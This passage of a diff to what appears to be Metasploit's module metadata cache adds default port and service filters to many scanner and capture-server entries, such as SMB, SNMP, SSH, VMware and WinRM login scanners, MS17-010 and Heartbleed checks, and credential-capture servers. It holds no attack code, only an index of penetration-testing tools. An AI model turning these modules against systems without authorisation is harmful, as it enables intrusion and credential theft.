"mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smb/smb2.rb", @@ -26379,6 +35818,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-09-10 15:04:22 +0000", "path": "/modules/auxiliary/scanner/smb/smb_enum_gpp.rb", @@ -26412,6 +35859,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-09-11 19:05:26 +0000", "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb", @@ -26441,6 +35896,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb", @@ -26471,6 +35934,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb", @@ -26503,6 +35974,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-07-25 15:13:41 +0000", "path": "/modules/auxiliary/scanner/smb/smb_login.rb", @@ -26532,6 +36011,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-10-20 15:32:25 +0000", "path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb", @@ -26571,6 +36058,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-08-27 13:11:22 +0000", "path": "/modules/auxiliary/scanner/smb/smb_ms17_010.rb", @@ -26610,6 +36105,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smb/smb_uninit_cred.rb", @@ -26639,6 +36142,14 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2018-05-07 00:13:11 +0000", "path": "/modules/auxiliary/scanner/smb/smb_version.rb", @@ -26671,6 +36182,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smtp/smtp_enum.rb", @@ -26700,6 +36223,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb", @@ -26731,6 +36266,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb", @@ -26760,6 +36307,18 @@ "platform": "", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/smtp/smtp_version.rb", @@ -26790,6 +36349,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/aix_version.rb", @@ -26820,6 +36385,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-07-09 12:56:00 +0000", "path": "/modules/auxiliary/scanner/snmp/arris_dg950.rb", @@ -26849,6 +36420,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb", @@ -26879,6 +36456,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb", @@ -26908,6 +36491,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/cisco_upload_file.rb", @@ -26938,6 +36527,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-12-18 17:11:47 +0000", "path": "/modules/auxiliary/scanner/snmp/cnpilot_r_snmp_loot.rb", @@ -26969,6 +36564,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-12-18 17:03:13 +0000", "path": "/modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.rb", @@ -26998,6 +36599,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb", @@ -27029,6 +36636,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/snmp/sbg6580_enum.rb", @@ -27060,6 +36673,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/snmp_enum.rb", @@ -27093,6 +36712,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb", @@ -27122,6 +36747,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/snmp_enumshares.rb", @@ -27151,6 +36782,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/snmp_enumusers.rb", @@ -27180,6 +36817,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/snmp_login.rb", @@ -27211,6 +36854,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/snmp_set.rb", @@ -27240,6 +36889,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb", @@ -27269,6 +36924,12 @@ "platform": "", "arch": "", "rport": 161, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb", @@ -27298,6 +36959,12 @@ "platform": "Unix", "arch": "cmd", "rport": 8101, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-15 06:48:35 +0000", "path": "/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb", @@ -27329,6 +36996,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-15 06:48:35 +0000", "path": "/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb", @@ -27359,6 +37032,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-03-26 15:43:10 +0000", "path": "/modules/auxiliary/scanner/ssh/detect_kippo.rb", @@ -27393,6 +37072,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb", @@ -27425,6 +37110,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-15 06:48:35 +0000", "path": "/modules/auxiliary/scanner/ssh/juniper_backdoor.rb", @@ -27458,6 +37149,12 @@ "platform": "", "arch": "", "rport": 8101, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ssh/karaf_login.rb", @@ -27498,6 +37195,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/ssh/ssh_enumusers.rb", @@ -27529,6 +37232,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-15 14:59:52 +0000", "path": "/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb", @@ -27558,6 +37267,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-03-08 21:23:11 +0000", "path": "/modules/auxiliary/scanner/ssh/ssh_login.rb", @@ -27588,6 +37303,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-03-12 20:14:08 +0000", "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb", @@ -27617,6 +37338,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ssh/ssh_version.rb", @@ -27662,6 +37389,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py", @@ -27701,6 +37434,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/ssl/openssl_ccs.rb", @@ -27749,6 +37488,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-20 20:29:56 +0000", "path": "/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb", @@ -27781,6 +37526,12 @@ "platform": "", "arch": "", "rport": 27015, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/steam/server_info.rb", @@ -27810,6 +37561,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telephony/wardial.rb", @@ -27839,6 +37596,12 @@ "platform": "", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telnet/brocade_enable_login.rb", @@ -27868,6 +37631,12 @@ "platform": "", "arch": "", "rport": 30718, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb", @@ -27898,6 +37667,12 @@ "platform": "", "arch": "", "rport": 9999, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb", @@ -27929,6 +37704,12 @@ "platform": "", "arch": "", "rport": 5000, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb", @@ -27962,6 +37743,12 @@ "platform": "", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2018-02-14 09:19:28 +0000", "path": "/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb", @@ -27991,6 +37778,12 @@ "platform": "", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2017-12-14 08:07:59 +0000", "path": "/modules/auxiliary/scanner/telnet/telnet_login.rb", @@ -28023,6 +37816,12 @@ "platform": "", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb", @@ -28052,6 +37851,12 @@ "platform": "", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/telnet/telnet_version.rb", @@ -28082,6 +37887,12 @@ "platform": "", "arch": "", "rport": 1025, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/scanner/teradata/teradata_odbc_login.py", @@ -28120,6 +37931,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb", @@ -28152,6 +37969,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/tftp/netdecision_tftp.rb", @@ -28181,6 +38004,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/tftp/tftpbrute.rb", @@ -28211,6 +38040,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/udp/udp_amplification.rb", @@ -28241,6 +38076,12 @@ "platform": "", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/upnp/ssdp_amp.rb", @@ -28274,6 +38115,12 @@ "platform": "", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/upnp/ssdp_msearch.rb", @@ -28307,6 +38154,12 @@ "platform": "", "arch": "", "rport": 6082, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-03-09 11:25:13 +0000", "path": "/modules/auxiliary/scanner/varnish/varnish_cli_file_read.rb", @@ -28340,6 +38193,12 @@ "platform": "", "arch": "", "rport": 6082, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/scanner/varnish/varnish_cli_login.rb", @@ -28369,6 +38228,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/esx_fingerprint.rb", @@ -28398,6 +38272,12 @@ "platform": "", "arch": "", "rport": 902, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmauthd_login.rb", @@ -28428,6 +38308,12 @@ "platform": "", "arch": "", "rport": 902, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmauthd_version.rb", @@ -28457,6 +38343,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb", @@ -28486,6 +38387,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb", @@ -28515,6 +38431,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_enum_users.rb", @@ -28544,6 +38475,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", @@ -28573,6 +38519,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_host_details.rb", @@ -28602,6 +38563,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_http_login.rb", @@ -28631,6 +38607,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb", @@ -28664,6 +38655,21 @@ "platform": "", "arch": "", "rport": 8222, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb", @@ -28697,6 +38703,21 @@ "platform": "", "arch": "", "rport": 9084, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb", @@ -28727,6 +38748,12 @@ "platform": "", "arch": "", "rport": 5900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-01-05 10:12:13 +0000", "path": "/modules/auxiliary/scanner/vnc/ard_root_pw.rb", @@ -28757,6 +38784,22 @@ "platform": "", "arch": "", "rport": 5900, + "autofilter_ports": [ + 5900, + 5901, + 5902, + 5903, + 5904, + 5905, + 5906, + 5907, + 5908, + 5909, + 5910 + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vnc/vnc_login.rb", @@ -28789,6 +38832,12 @@ "platform": "", "arch": "", "rport": 5900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vnc/vnc_none_auth.rb", @@ -28818,6 +38867,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/voice/recorder.rb", @@ -28848,6 +38903,12 @@ "platform": "", "arch": "", "rport": 17185, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb", @@ -28878,6 +38939,12 @@ "platform": "", "arch": "", "rport": 17185, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb", @@ -28907,6 +38974,24 @@ "platform": "", "arch": "", "rport": 5985, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 5985, + 5986 + ], + "autofilter_services": [ + "http", + "https", + "winrm" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb", @@ -28936,6 +39021,24 @@ "platform": "", "arch": "", "rport": 5985, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 5985, + 5986 + ], + "autofilter_services": [ + "http", + "https", + "winrm" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb", @@ -28965,6 +39068,24 @@ "platform": "", "arch": "", "rport": 5985, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 5985, + 5986 + ], + "autofilter_services": [ + "http", + "https", + "winrm" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb", @@ -28994,6 +39115,24 @@ "platform": "", "arch": "", "rport": 5985, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 5985, + 5986 + ], + "autofilter_services": [ + "http", + "https", + "winrm" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/winrm/winrm_wql.rb", @@ -29026,6 +39165,12 @@ "platform": "", "arch": "", "rport": 49152, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/scanner/wproxy/att_open_proxy.py", @@ -29063,6 +39208,12 @@ "platform": "", "arch": "", "rport": 3702, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-29 12:21:22 +0000", "path": "/modules/auxiliary/scanner/wsdd/wsdd_query.rb", @@ -29093,6 +39244,12 @@ "platform": "", "arch": "", "rport": 6000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/x11/open_x11.rb", @@ -29122,6 +39279,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/android_browsable_msf_launch.rb", @@ -29154,6 +39317,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/android_mercury_parseuri.rb", @@ -29183,6 +39352,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/browser_autopwn.rb", @@ -29212,6 +39387,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/server/browser_autopwn2.rb", @@ -29241,6 +39422,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/capture/drda.rb", @@ -29271,6 +39458,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/ftp.rb", @@ -29301,6 +39494,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/http.rb", @@ -29330,6 +39529,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/http_basic.rb", @@ -29360,6 +39565,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/http_javascript_keylogger.rb", @@ -29389,6 +39600,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/capture/http_ntlm.rb", @@ -29419,6 +39636,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/imap.rb", @@ -29448,6 +39671,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/mssql.rb", @@ -29477,6 +39706,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/mysql.rb", @@ -29507,6 +39742,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/pop3.rb", @@ -29536,6 +39777,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-20 16:34:51 +0000", "path": "/modules/auxiliary/server/capture/postgresql.rb", @@ -29567,6 +39814,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/server/capture/printjob_capture.rb", @@ -29596,6 +39849,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 